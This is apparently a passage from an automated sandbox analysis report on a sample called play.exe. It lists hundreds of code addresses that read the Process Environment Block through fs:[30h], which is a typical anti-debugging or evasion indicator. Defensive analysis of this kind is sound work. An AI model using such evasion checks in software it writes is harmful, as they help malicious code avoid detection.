Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02734180 mov eax, dword ptr fs:[00000030h]	0_2_02734180
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02734180 mov eax, dword ptr fs:[00000030h]	0_2_02734180
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0274C188 mov eax, dword ptr fs:[00000030h]	0_2_0274C188
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0274C188 mov eax, dword ptr fs:[00000030h]	0_2_0274C188
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268A197 mov eax, dword ptr fs:[00000030h]	0_2_0268A197
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268A197 mov eax, dword ptr fs:[00000030h]	0_2_0268A197
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268A197 mov eax, dword ptr fs:[00000030h]	0_2_0268A197
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CA660 mov eax, dword ptr fs:[00000030h]	0_2_026CA660
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CA660 mov eax, dword ptr fs:[00000030h]	0_2_026CA660
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C2674 mov eax, dword ptr fs:[00000030h]	0_2_026C2674
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275866E mov eax, dword ptr fs:[00000030h]	0_2_0275866E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275866E mov eax, dword ptr fs:[00000030h]	0_2_0275866E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AC640 mov eax, dword ptr fs:[00000030h]	0_2_026AC640
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269262C mov eax, dword ptr fs:[00000030h]	0_2_0269262C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C6620 mov eax, dword ptr fs:[00000030h]	0_2_026C6620
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C8620 mov eax, dword ptr fs:[00000030h]	0_2_026C8620
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026AE627 mov eax, dword ptr fs:[00000030h]	0_2_026AE627
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A260B mov eax, dword ptr fs:[00000030h]	0_2_026A260B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A260B mov eax, dword ptr fs:[00000030h]	0_2_026A260B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A260B mov eax, dword ptr fs:[00000030h]	0_2_026A260B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A260B mov eax, dword ptr fs:[00000030h]	0_2_026A260B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A260B mov eax, dword ptr fs:[00000030h]	0_2_026A260B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A260B mov eax, dword ptr fs:[00000030h]	0_2_026A260B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A260B mov eax, dword ptr fs:[00000030h]	0_2_026A260B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2619 mov eax, dword ptr fs:[00000030h]	0_2_026D2619
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270E609 mov eax, dword ptr fs:[00000030h]	0_2_0270E609
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027106F1 mov eax, dword ptr fs:[00000030h]	0_2_027106F1
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027106F1 mov eax, dword ptr fs:[00000030h]	0_2_027106F1
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270E6F2 mov eax, dword ptr fs:[00000030h]	0_2_0270E6F2
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270E6F2 mov eax, dword ptr fs:[00000030h]	0_2_0270E6F2
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270E6F2 mov eax, dword ptr fs:[00000030h]	0_2_0270E6F2
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270E6F2 mov eax, dword ptr fs:[00000030h]	0_2_0270E6F2
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CA6C7 mov ebx, dword ptr fs:[00000030h]	0_2_026CA6C7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CA6C7 mov eax, dword ptr fs:[00000030h]	0_2_026CA6C7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CC6A6 mov eax, dword ptr fs:[00000030h]	0_2_026CC6A6
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C66B0 mov eax, dword ptr fs:[00000030h]	0_2_026C66B0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02694690 mov eax, dword ptr fs:[00000030h]	0_2_02694690
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02694690 mov eax, dword ptr fs:[00000030h]	0_2_02694690
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02698770 mov eax, dword ptr fs:[00000030h]	0_2_02698770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h]	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h]	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h]	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h]	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h]	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h]	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h]	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h]	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h]	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h]	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h]	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0770 mov eax, dword ptr fs:[00000030h]	0_2_026A0770
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C674D mov esi, dword ptr fs:[00000030h]	0_2_026C674D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C674D mov eax, dword ptr fs:[00000030h]	0_2_026C674D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C674D mov eax, dword ptr fs:[00000030h]	0_2_026C674D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02714755 mov eax, dword ptr fs:[00000030h]	0_2_02714755
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271E75D mov eax, dword ptr fs:[00000030h]	0_2_0271E75D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02690750 mov eax, dword ptr fs:[00000030h]	0_2_02690750
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2750 mov eax, dword ptr fs:[00000030h]	0_2_026D2750
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026D2750 mov eax, dword ptr fs:[00000030h]	0_2_026D2750
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270C730 mov eax, dword ptr fs:[00000030h]	0_2_0270C730
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CC720 mov eax, dword ptr fs:[00000030h]	0_2_026CC720
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CC720 mov eax, dword ptr fs:[00000030h]	0_2_026CC720
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C273C mov eax, dword ptr fs:[00000030h]	0_2_026C273C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C273C mov ecx, dword ptr fs:[00000030h]	0_2_026C273C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C273C mov eax, dword ptr fs:[00000030h]	0_2_026C273C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CC700 mov eax, dword ptr fs:[00000030h]	0_2_026CC700
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02690710 mov eax, dword ptr fs:[00000030h]	0_2_02690710
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C0710 mov eax, dword ptr fs:[00000030h]	0_2_026C0710
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B27ED mov eax, dword ptr fs:[00000030h]	0_2_026B27ED
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B27ED mov eax, dword ptr fs:[00000030h]	0_2_026B27ED
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B27ED mov eax, dword ptr fs:[00000030h]	0_2_026B27ED
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271E7E1 mov eax, dword ptr fs:[00000030h]	0_2_0271E7E1
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026947FB mov eax, dword ptr fs:[00000030h]	0_2_026947FB
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026947FB mov eax, dword ptr fs:[00000030h]	0_2_026947FB
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269C7C0 mov eax, dword ptr fs:[00000030h]	0_2_0269C7C0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027107C3 mov eax, dword ptr fs:[00000030h]	0_2_027107C3
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026907AF mov eax, dword ptr fs:[00000030h]	0_2_026907AF
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027447A0 mov eax, dword ptr fs:[00000030h]	0_2_027447A0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273678E mov eax, dword ptr fs:[00000030h]	0_2_0273678E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271C460 mov ecx, dword ptr fs:[00000030h]	0_2_0271C460
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268847D mov eax, dword ptr fs:[00000030h]	0_2_0268847D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268847D mov eax, dword ptr fs:[00000030h]	0_2_0268847D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BA470 mov eax, dword ptr fs:[00000030h]	0_2_026BA470
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BA470 mov eax, dword ptr fs:[00000030h]	0_2_026BA470
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BA470 mov eax, dword ptr fs:[00000030h]	0_2_026BA470
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0274A456 mov eax, dword ptr fs:[00000030h]	0_2_0274A456
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE443 mov eax, dword ptr fs:[00000030h]	0_2_026CE443
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE443 mov eax, dword ptr fs:[00000030h]	0_2_026CE443
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE443 mov eax, dword ptr fs:[00000030h]	0_2_026CE443
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE443 mov eax, dword ptr fs:[00000030h]	0_2_026CE443
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE443 mov eax, dword ptr fs:[00000030h]	0_2_026CE443
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE443 mov eax, dword ptr fs:[00000030h]	0_2_026CE443
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE443 mov eax, dword ptr fs:[00000030h]	0_2_026CE443
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE443 mov eax, dword ptr fs:[00000030h]	0_2_026CE443
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B245A mov eax, dword ptr fs:[00000030h]	0_2_026B245A
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268645D mov eax, dword ptr fs:[00000030h]	0_2_0268645D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268E420 mov eax, dword ptr fs:[00000030h]	0_2_0268E420
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268E420 mov eax, dword ptr fs:[00000030h]	0_2_0268E420
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268E420 mov eax, dword ptr fs:[00000030h]	0_2_0268E420
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268C427 mov eax, dword ptr fs:[00000030h]	0_2_0268C427
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02716420 mov eax, dword ptr fs:[00000030h]	0_2_02716420
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02716420 mov eax, dword ptr fs:[00000030h]	0_2_02716420
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02716420 mov eax, dword ptr fs:[00000030h]	0_2_02716420
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02716420 mov eax, dword ptr fs:[00000030h]	0_2_02716420
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02716420 mov eax, dword ptr fs:[00000030h]	0_2_02716420
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02716420 mov eax, dword ptr fs:[00000030h]	0_2_02716420
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02716420 mov eax, dword ptr fs:[00000030h]	0_2_02716420
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C8402 mov eax, dword ptr fs:[00000030h]	0_2_026C8402
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C8402 mov eax, dword ptr fs:[00000030h]	0_2_026C8402
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C8402 mov eax, dword ptr fs:[00000030h]	0_2_026C8402
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026904E5 mov ecx, dword ptr fs:[00000030h]	0_2_026904E5
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271A4B0 mov eax, dword ptr fs:[00000030h]	0_2_0271A4B0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026964AB mov eax, dword ptr fs:[00000030h]	0_2_026964AB
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C44B0 mov ecx, dword ptr fs:[00000030h]	0_2_026C44B0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0274A49A mov eax, dword ptr fs:[00000030h]	0_2_0274A49A
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C656A mov eax, dword ptr fs:[00000030h]	0_2_026C656A
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C656A mov eax, dword ptr fs:[00000030h]	0_2_026C656A
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C656A mov eax, dword ptr fs:[00000030h]	0_2_026C656A
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02698550 mov eax, dword ptr fs:[00000030h]	0_2_02698550
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02698550 mov eax, dword ptr fs:[00000030h]	0_2_02698550
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE53E mov eax, dword ptr fs:[00000030h]	0_2_026BE53E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE53E mov eax, dword ptr fs:[00000030h]	0_2_026BE53E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE53E mov eax, dword ptr fs:[00000030h]	0_2_026BE53E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE53E mov eax, dword ptr fs:[00000030h]	0_2_026BE53E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE53E mov eax, dword ptr fs:[00000030h]	0_2_026BE53E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0535 mov eax, dword ptr fs:[00000030h]	0_2_026A0535
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0535 mov eax, dword ptr fs:[00000030h]	0_2_026A0535
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0535 mov eax, dword ptr fs:[00000030h]	0_2_026A0535
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0535 mov eax, dword ptr fs:[00000030h]	0_2_026A0535
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0535 mov eax, dword ptr fs:[00000030h]	0_2_026A0535
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0535 mov eax, dword ptr fs:[00000030h]	0_2_026A0535
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02726500 mov eax, dword ptr fs:[00000030h]	0_2_02726500
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02764500 mov eax, dword ptr fs:[00000030h]	0_2_02764500
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02764500 mov eax, dword ptr fs:[00000030h]	0_2_02764500
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02764500 mov eax, dword ptr fs:[00000030h]	0_2_02764500
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02764500 mov eax, dword ptr fs:[00000030h]	0_2_02764500
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02764500 mov eax, dword ptr fs:[00000030h]	0_2_02764500
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02764500 mov eax, dword ptr fs:[00000030h]	0_2_02764500
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02764500 mov eax, dword ptr fs:[00000030h]	0_2_02764500
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CC5ED mov eax, dword ptr fs:[00000030h]	0_2_026CC5ED
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CC5ED mov eax, dword ptr fs:[00000030h]	0_2_026CC5ED
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026925E0 mov eax, dword ptr fs:[00000030h]	0_2_026925E0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE5E7 mov eax, dword ptr fs:[00000030h]	0_2_026BE5E7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE5E7 mov eax, dword ptr fs:[00000030h]	0_2_026BE5E7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE5E7 mov eax, dword ptr fs:[00000030h]	0_2_026BE5E7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE5E7 mov eax, dword ptr fs:[00000030h]	0_2_026BE5E7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE5E7 mov eax, dword ptr fs:[00000030h]	0_2_026BE5E7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE5E7 mov eax, dword ptr fs:[00000030h]	0_2_026BE5E7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE5E7 mov eax, dword ptr fs:[00000030h]	0_2_026BE5E7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BE5E7 mov eax, dword ptr fs:[00000030h]	0_2_026BE5E7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE5CF mov eax, dword ptr fs:[00000030h]	0_2_026CE5CF
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE5CF mov eax, dword ptr fs:[00000030h]	0_2_026CE5CF
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026965D0 mov eax, dword ptr fs:[00000030h]	0_2_026965D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CA5D0 mov eax, dword ptr fs:[00000030h]	0_2_026CA5D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CA5D0 mov eax, dword ptr fs:[00000030h]	0_2_026CA5D0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027105A7 mov eax, dword ptr fs:[00000030h]	0_2_027105A7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027105A7 mov eax, dword ptr fs:[00000030h]	0_2_027105A7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_027105A7 mov eax, dword ptr fs:[00000030h]	0_2_027105A7
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B45B1 mov eax, dword ptr fs:[00000030h]	0_2_026B45B1
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B45B1 mov eax, dword ptr fs:[00000030h]	0_2_026B45B1
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C4588 mov eax, dword ptr fs:[00000030h]	0_2_026C4588
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02692582 mov eax, dword ptr fs:[00000030h]	0_2_02692582
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02692582 mov ecx, dword ptr fs:[00000030h]	0_2_02692582
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CE59C mov eax, dword ptr fs:[00000030h]	0_2_026CE59C
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270CA72 mov eax, dword ptr fs:[00000030h]	0_2_0270CA72
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270CA72 mov eax, dword ptr fs:[00000030h]	0_2_0270CA72
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CCA6F mov eax, dword ptr fs:[00000030h]	0_2_026CCA6F
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CCA6F mov eax, dword ptr fs:[00000030h]	0_2_026CCA6F
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CCA6F mov eax, dword ptr fs:[00000030h]	0_2_026CCA6F
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273EA60 mov eax, dword ptr fs:[00000030h]	0_2_0273EA60
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0A5B mov eax, dword ptr fs:[00000030h]	0_2_026A0A5B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026A0A5B mov eax, dword ptr fs:[00000030h]	0_2_026A0A5B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02696A50 mov eax, dword ptr fs:[00000030h]	0_2_02696A50
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02696A50 mov eax, dword ptr fs:[00000030h]	0_2_02696A50
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02696A50 mov eax, dword ptr fs:[00000030h]	0_2_02696A50
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02696A50 mov eax, dword ptr fs:[00000030h]	0_2_02696A50
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02696A50 mov eax, dword ptr fs:[00000030h]	0_2_02696A50
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02696A50 mov eax, dword ptr fs:[00000030h]	0_2_02696A50
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02696A50 mov eax, dword ptr fs:[00000030h]	0_2_02696A50
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BEA2E mov eax, dword ptr fs:[00000030h]	0_2_026BEA2E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CCA24 mov eax, dword ptr fs:[00000030h]	0_2_026CCA24
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B4A35 mov eax, dword ptr fs:[00000030h]	0_2_026B4A35
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026B4A35 mov eax, dword ptr fs:[00000030h]	0_2_026B4A35
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0271CA11 mov eax, dword ptr fs:[00000030h]	0_2_0271CA11
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CAAEE mov eax, dword ptr fs:[00000030h]	0_2_026CAAEE
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026CAAEE mov eax, dword ptr fs:[00000030h]	0_2_026CAAEE
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026E6ACC mov eax, dword ptr fs:[00000030h]	0_2_026E6ACC
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026E6ACC mov eax, dword ptr fs:[00000030h]	0_2_026E6ACC
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026E6ACC mov eax, dword ptr fs:[00000030h]	0_2_026E6ACC
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02690AD0 mov eax, dword ptr fs:[00000030h]	0_2_02690AD0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C4AD0 mov eax, dword ptr fs:[00000030h]	0_2_026C4AD0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C4AD0 mov eax, dword ptr fs:[00000030h]	0_2_026C4AD0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02698AA0 mov eax, dword ptr fs:[00000030h]	0_2_02698AA0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02698AA0 mov eax, dword ptr fs:[00000030h]	0_2_02698AA0
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026E6AA4 mov eax, dword ptr fs:[00000030h]	0_2_026E6AA4
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269EA80 mov eax, dword ptr fs:[00000030h]	0_2_0269EA80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269EA80 mov eax, dword ptr fs:[00000030h]	0_2_0269EA80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269EA80 mov eax, dword ptr fs:[00000030h]	0_2_0269EA80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269EA80 mov eax, dword ptr fs:[00000030h]	0_2_0269EA80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269EA80 mov eax, dword ptr fs:[00000030h]	0_2_0269EA80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269EA80 mov eax, dword ptr fs:[00000030h]	0_2_0269EA80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269EA80 mov eax, dword ptr fs:[00000030h]	0_2_0269EA80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269EA80 mov eax, dword ptr fs:[00000030h]	0_2_0269EA80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0269EA80 mov eax, dword ptr fs:[00000030h]	0_2_0269EA80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02764A80 mov eax, dword ptr fs:[00000030h]	0_2_02764A80
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026C8A90 mov edx, dword ptr fs:[00000030h]	0_2_026C8A90
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0268CB7E mov eax, dword ptr fs:[00000030h]	0_2_0268CB7E
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02762B57 mov eax, dword ptr fs:[00000030h]	0_2_02762B57
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02762B57 mov eax, dword ptr fs:[00000030h]	0_2_02762B57
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02762B57 mov eax, dword ptr fs:[00000030h]	0_2_02762B57
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02762B57 mov eax, dword ptr fs:[00000030h]	0_2_02762B57
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0273EB50 mov eax, dword ptr fs:[00000030h]	0_2_0273EB50
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02738B42 mov eax, dword ptr fs:[00000030h]	0_2_02738B42
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02726B40 mov eax, dword ptr fs:[00000030h]	0_2_02726B40
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02726B40 mov eax, dword ptr fs:[00000030h]	0_2_02726B40
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0275AB40 mov eax, dword ptr fs:[00000030h]	0_2_0275AB40
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02688B50 mov eax, dword ptr fs:[00000030h]	0_2_02688B50
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02744B4B mov eax, dword ptr fs:[00000030h]	0_2_02744B4B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02744B4B mov eax, dword ptr fs:[00000030h]	0_2_02744B4B
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BEB20 mov eax, dword ptr fs:[00000030h]	0_2_026BEB20
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_026BEB20 mov eax, dword ptr fs:[00000030h]	0_2_026BEB20
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02758B28 mov eax, dword ptr fs:[00000030h]	0_2_02758B28
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_02758B28 mov eax, dword ptr fs:[00000030h]	0_2_02758B28
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270EB1D mov eax, dword ptr fs:[00000030h]	0_2_0270EB1D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270EB1D mov eax, dword ptr fs:[00000030h]	0_2_0270EB1D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270EB1D mov eax, dword ptr fs:[00000030h]	0_2_0270EB1D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270EB1D mov eax, dword ptr fs:[00000030h]	0_2_0270EB1D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270EB1D mov eax, dword ptr fs:[00000030h]	0_2_0270EB1D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270EB1D mov eax, dword ptr fs:[00000030h]	0_2_0270EB1D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270EB1D mov eax, dword ptr fs:[00000030h]	0_2_0270EB1D
Source: C:\Users\user\Desktop\play.exe	Code function: 0_2_0270EB1D mov eax, dword ptr fs:[00000030h]	0_2_0270EB1D
